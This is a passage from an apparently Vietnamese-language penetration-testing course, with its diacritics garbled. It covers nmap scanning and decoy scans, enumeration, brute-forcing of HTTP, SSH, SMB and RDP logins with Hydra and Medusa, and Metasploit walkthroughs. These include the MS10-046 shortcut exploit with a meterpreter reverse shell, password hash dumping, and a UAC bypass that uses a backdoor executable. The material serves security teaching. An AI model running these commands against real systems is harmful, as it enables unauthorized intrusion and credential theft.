-z: zero-I/O mode khng gi d liu no ch pht ra mt gi tin.
192.168.10.102: host
1-4000: port cn qut.
Nmap (Network Mapper) l mt tin ch ngun m min ph cho pht
hin mng v kim ton an ninh. Nhiu qun tr mng v h thng cng
tm thy s hu ch cho cc cng vic nh kim k mng li, dch v
qun l lch trnh, v theo di thi gian hot ng dch v v my ch.
Nmap s dng cc gi tin IP th trong cc phng php mi xc nh
host no c sn trn mng, cc dch v (tn ng dng v phin bn) m
host ang cung cp, h iu hnh g (v cc phin bn h iu hnh)
m h ang chy, loi b lc gi tin hoc tng la no ang s dng,
v nhiu c im khc. N c thit k scan nhanh chng cc mng
-
34
ln, nhng ho. Nmap chy c trn tt c cc h iu hnh, v cc gi
nh phn chnh thc c sn cho Linux, Windows, v Mac OS X.
Cch dng n gin nht, khng c t tham s: nmap 192.168.10.0/24
Qu trnh c thc hin nh sau:
-
35
a. Chuyn t hostname thnh Ipv4 s dng DNS. Nu l mt a
ch IP th khng cn chuyn.
b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v
mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay
khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s
dung Ping NULL(-PN) b qua bc ny.
c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b
qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin.
d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti
nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect
scan s c thay th khi ngi dng Unix khng phi root thiu quyn
cn thit gi cc gi tin th.
e. In kt qua ln mn hnh
Qut host ang up: nmap sP PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo
-
36
Ph thuc vo phc tp ca mng ch v cc host, qu trnh qut c
th d dng b pht hin.Nmap cung cp kh nng lm gi a ch ngun
vi ty chn Ddecoy. N c to ra lm trn ngp ci site ch vi
nhng thng tin gi mo. Th c bn nm pha sau ty chn ny l chy
scan gi cng lc vi scan tht. H thng ch s tr li trn cc a ch
gi cng nh scan port thc ca chng ta. V quan trng hn c l a
ch gi phi cn sng. Ngc li, qu trnhscan vi SYN v dn n iu
kin t chi dch v
Nmap sSPE 192.168.10.0/24 D 10.10.10.1
-
37
d) Phng chng:
Tt tt c cc dch v khng cn thit. Trn Unix, chng ta c th thc hin
iu ny bng cch xem cc dch v khng cn thit trong /ect/inetd.conf v tt cc
dch vscript lc khi ng. Trn Windows, rt kh tt cc dch v khng cn thit
v theo cch hot ng ca Windows, cng TCP 139 v 445 cung cp nhiu chc nng
Windows hot ng.
3. Xc nh h iu hnh
Nhiu cng c mnh v nhiu k thut qut port c sn tm cc cng m trn
h thng ch. Nu nhn li, i tng u tin ca chng ta l qut cng xc nh
cc cng TCP v UDP trn my ch. V vi nhng thng tin , chng ta c th cng
no ang lng nghe c im yu no chng? Nhng chng ta cn tm nhiu
thng tin hn v mc tiu. chnh l xc nh h iu hnh.
a) Active OS Detection
Thng tin cng chi tit v h iu hnh th n cng hu ch trong vic phn
tch im yu. chng ta c th s dng k thut banner-grabbing, th ly thng tin t
cc dch v FTP, telnet, SMTP, HTTP. y l cch n gin nht pht hin h iu
hnh v phin bn m n ang chy. Theo , k thut ng n l k thut stack
fingerprinting. N l mt k thut rt mnh cho php chng ta bit chc h iu hnh
ch vi tin cy cao. Stack fingerprinting s yu cu ch nht mt cng ang lng
nghe. Nmap c on c trong trng hp khng c cng no ang m.
-
38
Active OS detection gi cc gi tin n ch xc nh im c trng chi
tit trong stack mng, iu ny cho php chng ta on h iu hnh. V phi gi cc
gi tin nh th, nn rt d dng b pht hin. v th y khng phi l cch m hacker
p dng tn cng.
Nmap vi O xc nh h iu hnh.
b) Passive OS Detection
S dng passive stack fingerprinting. N tng t nh khi nim active
stack fingerprinting. Thay v gi cc gi tin ti ch d dnh b pht hin. K tn
cng m thm gim st giao thng mng xc nh h iu hnh ang s dng. V
vy, bng vic gim st giao thng mng gia cc h thng khc nhau, chng ta c th
xc nh c h iu hnh. K thut ny ph thuc vo v tr trung tm trn mng v
trn cng cho php bt gi tin.
-
39
Chng 4: ENUMERATION
I. Enumeration l g?
Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca
t chc , xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi
dng, tn may,ti nguyn chia s v cc dch v . N cng ch ng truy vn hoc kt
ni ti muc tiu co c nhng thng tin hp l hn . Enumeration (lit k) c th
c nh ngha l qu trnh trch xut nhng thng tin c c trong phn scan ra
thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c
lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh
(host name), dch v (service), ti nguyn chia s (share).Nhng k thut lit k c
iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n
h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh
ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt
mc tiu . Khng cn thit phai tim mt tai khoan quan tri vi c hng ta c th tng tai
khon ny ln n mc co c quyn nht cho phep truy cp vao nhiu tai khoan
hn a cp trc y.
II. Banner Grabbing
K thut ch yu nht ca enumeration l banner grabbing, N c th c
nh ngha n gin nh l kt ni n ng dng t xa v quan st u ra. N c nhiu
thng tin cho k tn cng t xa. t nht chng ta cng xc nh c m hnh dch
v ang chy m nhiu trng hp l to nn qu trnh nghin cu cc im yu.
Phng chng: tt cc dch v khng cn thit. chng ta c th gii hn vic truy
cp ti cc dch v iu khin truy cp mng.
III. Enumerating cc dch v mng
1. Http fingerprinting
a) Telnet
TELNET (vit tt ca TerminaL NETwork) l mt giao thc mng (network
protocol) c dng trn cc kt ni vi Internet hoc cc kt ni ti mng my tnh
cc b LAN. Ti liu ca IETF, STD 8, (cn c gi l RFC 854 v RFC 855) c ni
rng: Mc ch ca giao thc TELNET l cung cp mt phng tin truyn thng
chung chung, c tnh lng truyn, dng rng 8 bit, nh hng byte. TELNET l
mt giao thc khch-ch (client-server protocol), da trn nn TCP, v phn khch
(ngi dng) thng kt ni vo cng 23 vi mt my ch, ni cung cp chng trnh
ng dng thi hnh cc dch v.
-
40
S dng telnet tm hiu thng tin t cng dch v ang m, s dng cng c
t xa ly thng tin thng qua cng telnet m hu ht cc h iu hnh iu h tr.
C:\>telnet www.google.com 80
b) Netcat
L mt tool cho php ghi v c data thng qua giao thc TCP v UDP. Netcat
c th s dng nh port scanner, backdoor, port redirecter, port listener,
S dng netcat bng dng lnh:
- Ch kt ni : nc [-ty_chn] tn_my cng1[-cng2]
- Ch lng nghe: nc -l -p cng [-ty_chn] [tn_my] [cng]
V d:
Ly banner ca Server:
nc n 192.168.10.102, cng 80
Qut cng
-
41
chy netcat vi ty chn -z. V d scan cc cng TCP(1->500) ca host
192.168.10.102
nc v www.google.com 80
www.google.com [74.215.71.105] 80 (http) open
c) Open SSL
L s n lc hp tc nhm pht trin b m ngun m vi y tnh nng,
c trin khai trn giao thc SSL (version 2 v version 3) vgiao thc TSL(version 1)
c qun l bi cng ng nhng ngi tnhnguyn trn ton th gii s dng
Internet kt ni v pht trin bOpenSSL v cc ti liu c lin quan.
Hu ht cc phn mm nh IMAP&POP, Samba, OpenLDAP, FTP,Apache v
nhng phn mm khc u yu cu cng vic kim tra tnh xcthc ca ngi s dng
trc khi cho php s dng cc dch v ny. Nhngmc nh vic truyn ti s xc
minh thng tin ngi s dng v mt khu(password) dng vn bn thun ty nn c
th c c hoc thay i bimt ngi khc. K thut m ha nh SSL s m bo
tnh an ton v nguynvn ca d liu, vi k thut ny thng tin truyn trn mng
dng im niim c m ha. Mt khi OpenSSL c ci t trn Linux
server chng ta c th s dng n nh mt cng c th ba cho php cc ng dngkhc
dng tnh nng SSL
OpenSSL l mt b cng c mt m trin khai trn giao thc mng SSLv TLS
v cc chun mt m c lin quan. Chng trnh OpenSSL l mt cng c dng lnh
-
42
s dng cc chcnng mt m ca cc th vin crypto ca OpenSSL t nhn.
OpenSSL c cc th vin cung cp cc chc nng mt m cho cc ngdng nh an
ton webserver.
L phn mm m ngun m , c th s dng c cho c mc ch thng mi
v phi thng mi vi tnh nng m ho mnh trn ton th gii, h tr cc giao
thc SSLv2 v SSLv3 v TLSv1, cho c php m ho RSA v Diffie-Hellman, DSO.
H tr cho OpenSSL v RSArefUS, nng cao kh nng x l cm mt khu i vi
kho ring .Chng ch X.509 da vo xc thc cho c pha client v server, H tr
danh sch thu hi chng ch X.509, kh nng ti iu chnh i vi mi URL ca cc
tham s bt tay SSL.
2. DNS Enumeration
DNS Enumeration l qu trnh nh v tt c cc my ch DNS v tng ng
ca h h s cho mt t chc. Mt cng ty c th c c hai ni b v bn ngoi my
ch DNS c th mang li thng tin nh tn ngi dng, tn my tnh, v a ch IP ca
h thng mc tiu tim nng. Hin c rt nhiu cc cng c c th c s dng c
c thng tin cho thc hin DNS lit k. Cc v d v cc cng c c th c s
dng lit k DNS nslookup, DIN, Registry M cho s Internet (ARIN), v Whois.
k khai DNS, chng ta phi c s hiu bit v DNS v lm th no n hot ng.
Chng ta phi c kin thc v cc bn ghi DNS. Danh sch cc bn ghi DNS
cung cp mt ci nhn tng quan cc loi bn ghi ti nguyn (c s d liu h s) c
lu gi trong cc tp tin khu vc ca tn min System (DNS). DNS thc hin mt c
s d liu phn tn, phn cp, v d phng thng tin lin kt vi cc tn min Internet
v a ch. Trong nhng min my ch, cc loi h s khc nhau c s dng cho cc
mc ch khc nhau. Danh sch sau y m t bn ghi DNS ph bin cc loi v s
dng ca h:
A (a ch)-Bn mt tn my ch n mt a ch IP
SOA (Start of Authority)-Xc nh my ch DNS c trch nhim cho cc tn
min thng tin
CNAME (tn kinh in)-Cung cp tn hoc b danh cho a ch ghi
MX (th trao i) Xc nh cc my ch mail cho tn min
SRV (dch v)-Nhn dng cc dch v nh dch v th mc
PTR (pointer)-Bn a ch IP lu tr tn
NS (tn my ch)-Xc nh my ch tn khc cho tn min
-
43
DNS Zone Transfer thng c s dng ti to d liu DNS trn mt s
my ch DNS, hoc sao lu cc tp tin DNS. Mt ngi s dng hoc my ch s
thc hin mt yu cu chuyn giao khu vc c th t mt name server.Nu my ch
tn cho php di chuyn vng xy ra, tt c cc tn DNS v IP a ch lu tr bi cc
my ch tn s c tr li trong vn bn ASCII con ngi c th c c.
Nslookup
Ta cng c th dng lnh trc tip nh sau:
Nslookup type=any tuoitre.vn
Type l loi dch v mng, nh lit k trn: NS(nameserver), MX(mail
exchange), any(tt c).
Tuoitre.vn: mt domain
-
44
3. Netbios name
NetBIOS l mt t vit tt cho mng Basic Input / Output System. N cung cp
cc dch v lin quan n lp phin ca m hnh OSI cho php cc ng dng trn cc
my tnh ring giao tip qua mt mng cc b. Tht s nh mt API, NetBIOS
khng phi l mt giao thc mng. H iu hnh c hn chy NetBIOS trn IEEE
802,2 v IPX / SPX s dng tng ng giao thc Frames NetBIOS (NBF) v
NetBIOS trn IPX / SPX (NBX) . Trong cc mng hin i, NetBIOS bnh thng
chy trn giao thc TCP / IP thng qua NetBIOS qua giao thc TCP / IP (NBT) .iu
ny dn n tng my tnh trong mng c c mt tn NetBIOS v mt a ch IP tng
ng vi mt (c th khc nhau) tn my ch.
NetBIOS name l c ch t tn cho cc ti nguyn trong 1 h thng theo
khng gian phng (khng c khi nim phn cp).
-
45
Chng 5: PASSWORD CRACKING
I. Gii Thiu
L qu trnh tm kim hoc phc hi password vi nhiu mc ch khc nhau.
Mc ch ca vic password cracking l gip cho ngi dng c th ly li mt
khu qun trc , hoc chim ot quyn truy cp khng xc thc ti h
thng.
II. Cc K Thut Password Cracking
1. Dictionary Attacks/Hybrid Attacks
Attacks s s dng file t in c sn cha cc hash so snh vi hash
ca password tm ra dng plaint text ca password nu hash trng
nhau.
Chng ta c th thm hoc o cc t c trong t in (Hybird Attacks).
Dng ny ng dng tt khj password l nhng k t thng thng, tc
nhanh, mc thnh cng ty thuc vo t in.
2. Brute Forcing Attacks
S dng mi t hp ca tt c cc k t a vo hash v so snh. Kh nng
thnh cng l tuyt i nu c thi gian v tc crack rt lu trong trng hp
password di v phc tp. ch tt cho password ngn.
3. Syllable Attacks/Pre-Computed Hashes
Kt hp hai cch trn bng cch to sn cc bn hash ca tt c t hp cc k t
v ch so snh trong qu trnh hash. Tc crack ch mt vi pht nu c sn cc bn
hash.
III. Cc Kiu Tn Cng Thng Gp
1. Active Password Cracking
Tm 1 username co thc va do tim password theo username o .Qu trnh
ny c th t ng ho tng tc tm kim .
Cc dng tn cng kiu Active Password Cracking:
o Password guessing: mt tp hp t in cc t v tn cng nh
mt khu v th tt c s kt hp crack cc password. Kiu tn
cng ny cn nhiu thi gian v lng bng thng mng ln; d
dng bi pht hin.
o Trojan/Spyware/Keylogger: l chng trnh chy nn gip cho k
tn cng c th ghi li bt k phm no c nhn (Keylogger);
1X42FHighlight
-
46
thu thp thng tin mt cch b mt v c nhn, t chc (Spyware);
vi s gip ca Trojan, k tn cng c th ly quyn truy cp
vo cc password c lu tr v c th c cc ti liu c nhn,
xa file.
2. Passive Password Cracking
Capture qua trnh log -in trn ng truyn break password
offline(Sniff, MITM)
Cc kiu tn cng ny bao gm:
o Wire Sniffing: k tn cng chy cc cng c sniffing gi tin trong
mng LAN truy cp v ghi li cc giao thng mng ang sng.
D liu bt c c th s bao gm password c gi ti cc h
thng t xa thng qua cc giao dch Telnet, FTP, rlogin v mail
in t gi v nhn.
o Man-in-the-Middle (MITM) and Replay Attack: Trong tn cng
MITM, attacker ginh quyn truy cp vo knh giao tip gia nn
nhn v server tm kim thng tin; trongreplay attack, cc gi
tin v th bi (token) xc thc c bt s dng mt sniffer.
3. Offline Password Cracking
Tip xc trc tip vi my tnh nn nhn copy cc file lu tr thng tin. V
d, SAM database trn Windows (%systemroot%/system32/config) hay /root/passwd
trn Linux. Sau c th s dng John tm password dang plain text.
IV. Cc cng c Password Cracking
1. Hydra
a) Gii thiu
Hydra l mt cng c b kha ng nhp mng rt nhanh, h tr nhiu giao
thc v dch v khc nhau.
Hydra l trnh b kha ng nhp xong xong, ngha l n chy nhiu tc v
cung mt lc qu trnh b kha c nhanh hn.
Cng c ny cho php cc nh nghin cu v chuyn gia bo mt c th
trnh by mc d dng chim quyn truy cp khng xc thc t xa ti h
thng no
1X42FHighlight
-
47
b) Cch dng
C php chung ca Hydra l:
Hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w
wait] [server server | IP] [service://server[:port]]
V d:
-
48
hydra f L login.txt P password.txt 192.168.10.1 http-get
http://192.168.10.1
Trong :
-f: finish:tm c cp username v password hp l u tin s kt thc
-L: file username (-l username)
-P: file password (-p password)
192.168.10.1: a ch ip cn b kha mt khu ng nhp
http-get: dch v http cng 80 (http c thay th bng http-get v http-
head)
http://192.168.10.1 l trang web cn cho qu trnh crack.
2. Medusa
a) Gii thiu
Medusa c th c s dng brute-force ng nhp theo tng module theo c
ch song song v nhanh chng. mc ch ca n l h tr nhiu dch v m c th
cho php qu trnh xc thc t xa nu c th.
Medusa c thit k da vo ba c im sau:
Kim tra song song da vo lung: c th kim tra trn nhiu host, username,
password.
Thit k theo module: Mi dch v tn ti dng file (.mod) c lp. Chng ta
khng cn thit chnh sa n nhn m rng danh sch cc dch v h tr for
vic brute-forcing.
-
49
b) Cch dng
C php:
Medusa [h host | -H file] [-u username | -U file] [-p password | -P file] [-C
file] M module [OPT]
-h host hay a ch IP, -H file cha cc host
-
50
-u username, -U file cha username
-p password, -P file cha password
-C file kt hp dng host, username, password dng host:username:password
-M module l bt buc theo sau l tn cc module c h tr. xem tt c
cc module ta g: medusa d v cch dng chi tit cho 1 module no : medusa M
tn_module q
-
51
V. Password Cracking Trn Cc Giao Thc
1. HTTP (HyperText Tranfer Protocol)
c) Khi nim
y l giao thc chuyn i siu vn bn v thng c s dng cho cc
ng dng Web (World Wide Web WWW) trn cng mc nh l 80.
d) C 2 dng m ha HTTP:
Basic access authentication: l phng php trnh duyt web hoc cc
chng trnh khc cung cp username v password when c yu cu. N h tr
tt c cc trnh duyt web, tuy nhin, c username v password c gi i dng
plain text nn t c p dng vo thc t. V qu trnh ng nhp vo router l
mt v d in hnh.
1X42FHighlight
1X42FHighlight
-
52
Chng ta c th dng Wireshark bt:
-
53
Nh trn hnh username v password bt c: admin:12345
Digest access authentication: l mt trong nhng phng php c tha
thun p dng cho my ch web c th vt qua cc thng tin vi
trnh duyt web ca ngi dng. N s dng hm bm(hash) m ha
cc thng tin nhy cm trc khi gi chng qua mng.
e) Crack Password HTTP
Ta c th dng nmap (Network Mapper) qut cng no ang m:
-
54
Truy cp vo trinh duyt kim tra th qu trnh xc thc
Khi nhn nt Cancel ta c thng bo:
-
55
Vo Terminal trn BackTrack 5 g: hydra f L login.txt P password.txt
192.168.10.1 http-get http://192.168.10.1
Trong :
-f: finish:tm c cp username v password hp l u tin s kt thc
-L: file username (-l username)
-P: file password (-p password)
192.168.10.1: a ch ip cn b kha mt khu ng nhp
http-get: dch v http cng 80 (http c thay th bng http-get v http-
head)
http://192.168.10.1 l trang web cn cho qu trnh crack.
-
56
Hoc: medusa h 192.168.10.1 U login.txt P password M http
Trong :
-h host hay a ch ip cn b kha mt khu ng nhp.
-U: file username (-u username)
-P: file password (-p password)
-M http giao thc cn crack. M vit tc cho modum
-
57
Sau quay li trinh duyt web, ta nhp username v password tm c:
-
58
2. SSH (Secure Shell)
a) Khi nim
SSH l mt giao thc mng cho vic giao tip d liu bo mt, cc dch v
shell t xa hoc thc thi lnh vn cc dch v mng bo mt khc gia cc my tnh
c ni mng vi nhau. N kt ni thng qua mt knh bo mt trn mt mng
khng bo mt: mt my ch v mt my khch (chy cc chng SSH server v
SSH Client).
ng dng c bit n nhiu nht ca giao thc ny l vic truy cp n
ti khon shell ca h iu hnh LIKE-UNIX (LINUX). N sinh ra thay th cc
chun giao thc khng bo mt khc nh telnet, rsh, rexec , khi m password
c gi i dng plain text, c th d dng c c.
SSH hot ng trn TCP cng 22.
b) Crack password qua SSH
Kim tra dch v ssh c ang chy hay khng?
Vi hydra: hydra f L login.txt P password.txt 192.168.10.101 ssh
-
59
Vi Medusa: medusa h 192.168.10.101 U login.txt P password.txt M
ssh
V y l cch truy cp vo thit b Nokia N900 t xa vi username v
password va tm c:
-
60
V d kim tra cc card mng t xa:
-
61
3. SMB (Server Message Block)
a) Khi nim
SMB c bit n nh l Common Internet File System (CIFS), hot ng
tng ng dng trong m hnh OSI, thng thng c s dng cung cp
truy cp chia s cc file, my in v cc giao tip khc nhau gia cc nt mng
trn mng. N cn cung cp k thut giao tip lin qu trnh c xc thc. Hu ht
s dng ca SMB u lin quan n Microsoft Windows.
SMB c th chy trn tng giao dch (Session) hoc thp hn:
o Trc tip trn TCP cng 445;
o Thng qua NetBIOS (cung cp nhiu dch v lin quan n tng
ng dng trong m hnh OSI cho php cc ng dng trn cc my
tnh phn bit c th giao tip vi nhau thng qua mng LAN)
trn UDP cng 137, 138 v TCP 137, 139
b) Crack password SMB
Qut xem c my no ang chy dch v smb port 445 hay khng?
-
62
Vi Hydra tao g: hydra f L login.txt P password.txt 192.168.10.100 smb
Vi Medusa, ta g: medusa h 192.168.10.100 U login.txt P password.txt
smbnt
-
63
V y l cch chng ta s dng username v password va tm c
-
64
4. RDP (Remote Desktop Protocol)
a) Khi nim
RDP l mt giao thc giao tip ca c nhn hay t chc c pht trin bi
Microsoft, cung cp cho ngi dng mt giao din ha i vi my tnh khc.
Hin ti, Microsoft chuyn phn mm ch (server) RDP sang Remote
Desktop Services nh Terminal Services (dch v u cui) v phn mm khch
(client) nh l Terminal Services Client.
Khi thc hin kt ni n mt my tnh no t xa, chng ta s nhn c
yu cu xc thc ngi dng v mt khu ph hp. V vy vic crack password
RDP l cn thit nu ta truy cp m cha c s chp nhn ca ngi dng.
RDP hot ng trn TCP cng 3389
b) Crack password RDP
Qut my tnh xem no c cng 3389 ang m hay khng?
1X42FHighlight
-
65
Vi Hydra: hydra f L login.txt P password.txt 192.168.10.100 rdp t 4
w 1
Vi Medusa, n khng h tr trc tip giao thc RDP. Tuy nhin, ta c th
dng modum wrapper vi script l rdesktop. Ta thc hin nh sau:
-
66
Medusa M wrapper m TYPE:STDIN m PROG:rdesktop m ARGS:-u
%U p - %H h 192.168.10.100 U login.txt P password.txt
Tuy vy, chng trnh vn hot ng cha ng n lm v tn nhiu thi gian
v phi k tn cng phi nhp vo tng password mt.
y l cch dng rdesktop iu khin my tnh t xa vi username v
password tm c:
-
67
Chng 6: SYSTEM HACKING
I. GII THIU V METASPLOIT
1. Gii thiu
Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l
hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin
tn cng mng. Mt d n con rt ni ting ca Metasploit l Metasploit Framework.
Metasploit Framework l mt mi trng dng kim tra ,tn cng v khai
thc li ca cc service. Metasploit c xy dng t ngn ng hng i tng Perl,
vi nhng components c vit bng C, assembler, v Python.Metasploit c th chy
trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta c th download
chng trnh ti www.metasploit.com
Metasploit c phin bn hin ti l 4.4.
2. Cc thnh phn ca Metasploit
Metasploit h tr nhiu giao din vi ngi dng:
Console interface: dng lnh msfconsole. Msfconsole interface s dng cc dng lnh cu hnh, kim tra nn nhanh hn v mm do hn
Web interface: dng msfweb, giao tip vi ngi dng thng qua giao din web
Command line interface: dng msfcli
Enviroment :
Global Enviroment:c thc thi thng qua 2 cu lnh setg v unsetg, nhng options c gn y s mang tnh ton cc, c a vo tt c cc module exploits
Temporary Enviroment: c thc thi thng qua 2 cu lnh set v unset, enviroment ny ch c a vo module exploit ang load hin ti, khng nh hng n cc module exploit khc
Chng c th lu li enviroment mnh cu hnh thng qua lnh save. Mi
trng s c lu trong ./msf/config v s c load tr li khi user interface
c thc hin
3. S dng Metasploit Framework
a) Chn module exploit
La chn chng trnh, dch v li m Metasploit c h tr khai thc
-
68
show exploits: xem cc module exploit m framework c h tr
use exploit_name: chn module exploit
info exploit_name: xem thng tin v module exploit
Chng ta nn cp nht thng xuyn cc li dch v cng nh cc module
trn www.metasploit.com hoc qua lnh msfupdate hoc svn update
/opt/metasploit/msf3/
b) Cu hnh module exploit chn
show options: Xc nh nhng options no cn cu hnh
set : cu hnh cho nhng option ca module
Mt vi module cn c nhng advanced options, chng ta c th xem bng
cch gdng lnh show advanceds
c) Verify nhng options va cu hnh
check: kim tra xem nhng option c set chnh xc cha.
d) La chn target
La chn h diu hnh no thc hin
show targets: nhng target c cung cp bi module
set: xc nh target no
vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) La chn payload
Payload l on code m s chy trn h thng remote machine, l mt
phn ca virus my tnh thc thi m c.
show payloads: lit k ra nhng payload ca module exploit hin ti
info payload_name: xem thng tin chi tit v payload
set payload payload_name: xc nh payload module name.Sau khi
la chn payload no, dng lnh show options xem nhng options
ca payload
show advanced: xem nhng advanced options ca payload
f) Thc thi exploit
exploit: lnh dng thc thi payload code. Payload sau s cung
cp cho chng ta nhng thng tin v h thng c khai thc
4. Gii thiu Payload Meterpreter
Meterpreter, vit tt t Meta-Interpreter l mt payload nng cao c trong
Metasploit Framework. Muc ch ca n l cung cp nhng tp lnh khai thc,
-
69
tn cng cc my remote computers. N c vit t cc developers di dng shared
object (DLL) files. Meterpreter v cc thnh phn m rng c thc thi trong b nh,
hon ton khng c ghi ln a nn c th trnh c s pht hin t cc phn mm
chng virus
Meterpreter cung cp mt tp lnh chng ta c th khai thc trn cc remote
computers:
Fs(Filesystem): cung cp qu trnh tng tc vi filesystem
Net: cho php xem thng tin mng ca remote machine nh IP, route
table
Process:cho php to tng tc vi cc tin trnh trn remote
machine
Sys: cho php xem thng tin h thng, mi trng ca remote
machine
a) S dng module Fs
cd directory:ging lnh cd ca commandline, chuyn th mc lm
vic
getcwd:cho bit th mc ang lm vic hin ti
ls:lit k cc th mc v tp tin
upload src1 [src2 ...] dst:upload file t src ti dst.
download src1 [src2 ...] dst:download file t src ti dst.
b) S dng module Net
ipconfig:xem cu hnh ca card mng ca my tnh t xa
route:xem bng nh tuyn ca remote machine
c) S dng module Process
execute -f file [ -a args ] [ -Hc ]:Cu lnh execute cho php to ra
mt process mi trn remote machine v s dng process khai
thc d liu
kill pid1 pid2 pid3:hu hoc tt cc process ang chy trn my
remote machine
ps:lit k nhng process ca remote machine
d) S dng module Sys
getuid: cho bit username hin ti ca remote machine
sysinfo:cho bit thng tin v my tnh nn nhn: h iu hnh, phin
bn, nn tn 32bits hay 64bits
-
70
5. Cch phng chng
Thng xuyn cp nht cc bn v li ca Microsofts. V d nh Metasploit
khng th khai thc c li Lsass_ms04_011, chng ta phi cp nht bn v li ca
Microsoft. Theo Microsoft nh gi, y l mt li nghim trng, c trn hu ht tt c
cc h iu hnh windows. Chng ta nn s dng hotfix c number l 835732 v li
trn.
II. Li MS10-046 (2286198)
1. Gii thiu
y l mt li rt nghim trng lin quan n Windows Shellca cho tt c cc
h iu hnh b nh hng, cho php k tn cng chim ly ton quyn iu khin
Windows v thc thi m ngun t xa. Li ny c pht hin vo thng 06/2010 v
n thng 08/2010, Microsoft tung ba bn v li.
Li nguy him ny nm trong cc tp tin "shortcut" (*.lnk) ca Windows, cc
tp tin ny thng nm giao din desktop hay trnh n Start. Bng cch to ra mt
tp tin shortcut nhng m c, tin tc c th t ng thc thi m c khi ngi dng
xem tp tin shortcut hay ni dung ca mt th mc cha tp tin shortcut nhng m
c.
Cc bn Windows b nh hng bao gm.
-
71
2. Cc bc tn cng:
Saukhi khi ng BackTrack v ang nhp thnh cng, ta khi ng
Terminal ta c:
Ta g tip: msfconsole v enter:
H iu Hnh
Windows XP Service Pack 3
Windows Server 2008 for 32-bit Systems
and Windows Server 2008 for 32-bit
Systems Service Pack 2*
Windows XP Professional x64 Edition
Service Pack 2
Windows Server 2008 for x64-based
Systems and Windows Server 2008 for
x64-based Systems Service Pack 2*
Windows Server 2003 Service Pack 2
Windows Server 2008 for Itanium-based
Systems and Windows Server 2008 for
Itanium-based Systems Service Pack 2
Windows Server 2003 x64 Edition Service
Pack 2 Windows 7 for 32-bit Systems
Windows Server 2003 with SP2 for
Itanium-based Systems Windows 7 for x64-based Systems
Windows Vista Service Pack 1 and
Windows Vista Service Pack 2
Windows Server 2008 R2 for x64-based
Systems*
Windows Vista x64 Edition Service Pack 1
and Windows Vista x64 Edition Service
Pack 2
Windows Server 2008 R2 for Itanium-
based Systems
-
72
dng m li ms10-046: search ms10-046 v enter
Ta g tip:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader v
enter
-
73
Dng lnh: show options xem cc tham s cn thit c th tin
hnh tn cng c:
o SRVHOST: a ch my ca k tn cng, lng nghe c nn
nhn no kt ni n hay khng
o SRVPORT: cng lng nghe, mc nh l http (80)
-
74
Ta s:
o set PAYLOADwindows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set lhost a ch IP: set LHOST 192.168.1.200. LHOST l
tham s ca PAYLOAD m ta va set trn.
exploit khi ng server lng nghe trn my tnh tn cng
-
75
Trn my tnh nn nhn, to 1 shortcut bng cch nhn phi chut vo
Desktop -> New -> Shortcut
-
76
Ta g vo a ch ca my tn cng vo Type the location of the item:
http://192.168.1.200/anythingv chn Next
t tn cho shortcut va mi to v nhn Finish. Ta s m shortcut ny:
-
77
i mt lt, trn my tnh tn cng ta c:
Dng lnh sessions xem cc phin lm vic m Metasploit ang c:
-
78
tng tc vi 1 session no ta thc hin: sessions i 1 (1 l id ca
sessions)
V by gi th mi vic tr nn d dng hn, khi k tn cng iu khin
c my nn nhn vi ton quyn. V d:
Lnh sysinfo ly thng tin ca my nn nhn:
Lnh hashdump ly mt khu ca ngi dng di dng hash
-
79
Lnh rt hu ch s dng cmd (command-line): shell
3. Cch phng chng
Thng xuyn cp nht cc bn v li ca Windows trch b hacker li
dng.
-
80
Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin
Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt
quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu
Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc"
hay Blue Screen.
III. Li BYPASSUAC
1. Gii thiu
T Windows Vista tr v sau, Microsoft gii thiu mt tin ch c xy
dng sn l User Access Control (UAC). UAC lm tng tnh bo mt ca Windows
bng cch gii hn cc phn mm ng dng ca nhm quyn ngi s dng c bn.
V vy, ch nhng phn mm c ngi dng tin tng mi nhn c quyn qun
tr, nhng phn mm khc th khng. Tuy nhin, vi ti khon ca ngi qun tr, cc
ng dng vn b gii hn nh nhng ti khon thng khc.
Cc h iu hnh c tch hp sn User Access Control iu b nh hng v c
th khai thc.
2. Cc bc tn cng
Vo Terminal, g msfconsole v Enter:
use exploit/multi/handler. y l mt modume cung cp nhiu chc
nng ca h thng payload Metasploit cho chng ta khai thc bng cch
-
81
thc hin: run post/windows/escalate/bypassuac nh l v d trong
trng hp ny v cn nhiu th khc na.
set PAYLOAD windows/meterpreter/reverse_tcp: cho php kt ni
li vi my tnh tn cng d dng iu khin.
set LHOST 192.168.1.202: host lng nghe, a ch IP ca my tn cng
set LPORT 6789:port lng nghe, ty min l cha c s dng.
exploit bt u khi ng server.
-
82
Ta s to ra mt con backdoor cho php kt ni n server m chng ta khi ng sn trc .
-
83
Sau khi to xong, ta copy file backdoor.exe n my tnh nn nhn v
thc thi. Chng ta c th s dng Samba chia s file gia Windows v
Linux.
Trn my tnh Windows, ta s share file vi ton quyn truy cp:
-
84
Tr li my tnh nn nhn, v thc thi file backdoor.exe va copy. Khi
trn my tnh nn nhn chng ta s nhn c nh sau:
